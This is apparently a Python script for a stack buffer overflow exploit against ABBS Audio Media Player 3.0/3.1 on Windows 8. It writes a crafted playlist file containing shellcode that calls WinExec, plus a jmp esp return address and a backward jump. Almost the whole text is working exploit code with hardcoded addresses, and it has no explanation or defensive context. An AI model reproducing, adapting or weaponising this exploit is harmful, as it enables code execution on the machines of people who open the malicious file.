junk

1. #!/usr/bin/env python
2.  
3. # ABBS Audio Media Player (3.0/3.1) Buffer Overflow exploit (M3U/LST)
4. # Win8
5. # Rh0
6.  
7. print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0/3.1[*]"
8. bufferlen = 4108;               # buffer until return address overwrite
9. nops = "\x90" * 5;
10. ## WinExec("calc",1)
11. shellcode = (
12.             "\x33\xC0"              # xor eax,eax
13.             "\x50"                  # push eax
14.             "\x68\x63\x61\x6C\x63"  # push 'calc'
15.             "\x8B\xDC"              # mov ebx, esp
16.             "\xB0\x01"              # mov al, 1
17.             "\x50"                  # push eax
18.             "\x53"                  # push ebx
19.             "\xB8\x86\x30\x82\x74"  # mov eax, 0x74823086 ### This maybe must be adjusted (contains &(Winexec@kernel32 - 1 )
20.             "\x04\x01"              # add al, 1
21.             "\xFF\xD0"              # call eax (WinExec@kernel32.dll = 0x74823087)
22.             )
23.  
24. ret = "\x54\xad\x42\x76";           # jmp esp @user32.dll (0x7642ad54) This maybe must be adjusted. Enter address which points to "jmp esp"
25. esp = "\xe9\xeb\xef\xff\xff";       # jmp backwards 4116 bytes
26.  
27. buffer  = nops
28. buffer += shellcode
29. buffer += "A" * (bufferlen - len(buffer))
30. buffer += ret;
31. buffer += esp;
32.  
33. try:
34.     A = open("exploit.lst","wb")        # exploit works also with .m3u
35.     A.write(buffer)
36.     A.close()
37.     print "[*] exploit.lst created [*]"
38. except:
39.     print "[*] Error while creating file [*]"
40.  
41. print "[*] Enter to continue.. [*]"
42. raw_input()